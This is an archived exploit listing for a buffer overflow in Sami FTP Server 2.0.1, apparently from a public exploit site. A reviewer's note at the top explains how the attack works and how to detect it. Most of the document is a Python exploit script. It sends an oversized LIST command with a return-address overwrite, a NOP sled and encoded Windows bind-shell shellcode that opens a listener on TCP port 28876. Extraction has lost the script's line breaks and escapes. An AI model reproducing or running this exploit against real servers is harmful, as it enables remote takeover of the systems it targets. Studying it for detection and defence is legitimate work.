
Sami FTP Server 2.0.1 Buffer Overflow

Posted on 02 March 2013

# NOTE(review): this listing was flattened by page extraction -- the original
# line breaks, indentation and string escape characters were lost, so the text
# below is not runnable as shown and is kept verbatim as a historical record.
#
# What the visible code does (per its own header comments and calls):
#   * connects to <IP from argv[1]>:21, logs in with USER/PASS, then sends a
#     LIST command whose argument is 218 bytes of filler, a 4-byte return
#     address overwrite (the header says EIP is hit at offset 218 and points at a
#     JMP ESP in a universal DLL), a 37-byte NOP sled and a 241-byte encoded
#     payload, about 500 bytes in total;
#   * the payload is described by the author as a Windows bind shell that
#     listens on TCP 28876 once the overflow fires;
#   * per the description, the overflow is triggered only when the server
#     operator views the Log tab -- so the fault appears to be in the GUI's log
#     rendering rather than in the network command parser itself (inferred from
#     the description, not verifiable from this listing).
#
# Defender notes:
#   * Sami FTP Server 2.0.1 is end-of-life software; the only real mitigation
#     is to retire it or keep it off any network that untrusted hosts can reach.
#   * Detection: an FTP command with an argument of several hundred bytes (here
#     a ~500-byte LIST) is anomalous and easy to alert on at a proxy or IDS; a
#     new inbound listener appearing on an unexpected high port on the server
#     is the post-exploitation indicator the page itself describes.
#   * The byte string below is an encoded payload taken from a third-party
#     source; treat any copy of this file as malicious for AV/EDR purposes.
#!/usr/bin/env python # Exploit Title: Sami FTP LIST buffer overflow # Date: 27 Feb 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.karjasoft.com/old.php # Version: Sami FTP Server 2.0.1 # Tested on: Windows XP Pro SP1, English # Windows XP Pro SP2, English # # Description: # A buffer overflow is triggered when a long LIST command is sent to the # server and the user views the Log tab. # from socket import * import struct, sys IP = sys.argv[1] # Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/ # Remove bad chars using msfencode: # msfencode -b "x00x0ax0dx2f" -i w32-bind-ngs-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "xd9xc7xbex4dxa5xdex30xd9x74x24xf4x5fx2bxc9" + "xb1x36x31x77x19x03x77x19x83xc7x04xafx50xef" + "xf9x4bx10x61xcax18x50x8exa1x68x81x05xdbx9c" + "x32x67x04x17x72xa0x0bx3fx0ex23xc2x57xc2x9c" + "xd6x95x4ax45x4fxaexf9xe1xd8xdfxf7x69xafx39" + "xb2x89x99x09x94x41x50x76x31xaaxc9x39xefx0c" + "x5fxeex5ex0cxb0x3cxc5x5dxc4x61x39xe9x86x84" + "x39xecxddx3dxf2xcex20xa8x53x3exf1x68xd7x74" + "x64x6dx09xc0xb0xc1xe1x58x95xddx36xeax90x2a" + "x7cx2bx2ex3fxdfxb8x9bx9bxe1x57x14x54xf5xf6" + "xa0xd1xeaxf9x5fx6cxfaxf9x9bxffx50x7dx9dxf6" + "xd3x76x6fx56x18xd4x90xb6x77x4fxeex08x0bx1a" + "x5ex2ax46x1bx70x7fx67x34xe4xfexb7x4bxf8x8f" + "xfbxd9x17xd8x56x48xe7x36x2dxb3x63x4ex1fxe6" + "xdexc6x03x6bxbbx36x49x0fx67x0exfax5bxccxa8" + "xbbx72x12x60xc3xb9x31xdfx99x93x6bx19x5axfb" + "x84xf2x37x51xc2xaex48x03x08xc5xf1x50x39x13" + "x02x57x45" ) # EIP overwritten at offset 218 # JMP ESP at 10028283 C:Program FilesPMSystemTemp mp0.dll (Universal) buf = "A" * 218 + struct.pack("<I", 0x10028283) + "x90" * 37 + shellcode s = socket(AF_INET, SOCK_STREAM) s.connect((IP,21)) print s.recv(1024) s.send("USER superkojiman ") print s.recv(1024) s.send("PASS letmein ") print s.recv(1024) print "[+] sending payload of size", len(buf) s.send("LIST " + buf + " ") print s.recv(1024) 
s.close() print "[+] sent. Connect to %s on port 28876" % (sys.argv[1],)

 
